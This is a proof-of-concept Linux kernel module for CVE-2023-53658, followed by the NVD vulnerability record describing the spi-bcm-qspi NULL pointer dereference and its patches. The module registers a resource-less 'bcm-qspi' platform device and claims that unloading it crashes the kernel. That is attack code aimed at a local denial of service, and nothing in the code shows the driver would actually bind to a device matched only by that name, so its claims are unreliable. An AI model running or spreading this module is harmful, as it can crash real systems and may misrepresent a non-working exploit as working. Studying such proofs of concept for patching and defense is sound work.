CVE-2023-53658

/* CVE-2023-53658 PoC - Trigger NULL pointer dereference in spi-bcm-qspi driver * This PoC demonstrates how to trigger the vulnerability by simulating a device * without proper hif_mspi or mspi resources. */ #include <linux/module.h> #include <linux/platform_device.h> #include <linux/of.h> #include <linux/spi/spi.h> /* Simulated platform device with no hif_mspi or mspi resources */ static struct resource dummy_resources[] = { /* Intentionally no SPI resources defined */ }; static struct platform_device dummy_pdev = { .name = "bcm-qspi", .id = -1, .num_resources = 0, .resource = dummy_resources, }; static int __init poc_init(void) { int ret; pr_info("CVE-2023-53658 PoC: Registering dummy bcm-qspi device\n"); /* Register a platform device without hif_mspi/mspi resources */ ret = platform_device_register(&dummy_pdev); if (ret) { pr_err("Failed to register platform device\n"); return ret; } pr_info("Device registered. Trigger remove to cause NULL pointer dereference\n"); return 0; } static void __exit poc_exit(void) { pr_info("CVE-2023-53658 PoC: Unregistering device (triggers NULL ptr deref)\n"); /* Unregistering will trigger the NULL pointer dereference in remove callback */ platform_device_unregister(&dummy_pdev); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("PoC for CVE-2023-53658 - bcm-qspi NULL pointer dereference");

{"cve": {"id": "CVE-2023-53658", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.443", "lastModified": "2026-02-03T19:51:14.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: bcm-qspi: return error if neither hif_mspi nor mspi is available\n\nIf neither a \"hif_mspi\" nor \"mspi\" resource is present, the driver will\njust early exit in probe but still return success. Apart from not doing\nanything meaningful, this would then also lead to a null pointer access\non removal, as platform_get_drvdata() would return NULL, which it would\nthen try to dereference when trying to unregister the spi master.\n\nFix this by unconditionally calling devm_ioremap_resource(), as it can\nhandle a NULL res and will then return a viable ERR_PTR() if we get one.\n\nThe \"return 0;\" was previously a \"goto qspi_resource_err;\" where then\nret was returned, but since ret was still initialized to 0 at this place\nthis was a valid conversion in 63c5395bb7a9 (\"spi: bcm-qspi: Fix\nuse-after-free on unbind\"). The issue was not introduced by this commit,\nonly made more obvious."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9", "versionEndExcluding": "4.14.322", "matchCriteriaId": "A54AA59F-7E5E-40C7-AF0D-300A9397F462"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": "43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.4", "matchCriteriaId": "A91BC267-63EE-413E-A6EF-6B96C2A278D1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/217b6ea8cf7b819477bca597a6ae2d43d38ba283", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/22ae32d80ef590d12a2364e4621f90f7c58445c7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/32b9c8f7892c19f7f5c9fed5fb410b9fd5990bb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/398e6a015877d44327f754aeb48ff3354945c78c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c1f23ad34fcdace50275a6aa1e1969b41c6233f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a91c34357afcfaa5307e254f22a8452550a07b34", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d20db3c58a7f9361e370a7850ceb60dbdf62eea3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d3dcdb43c872a3b967345144151a2c9bb9124c9b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}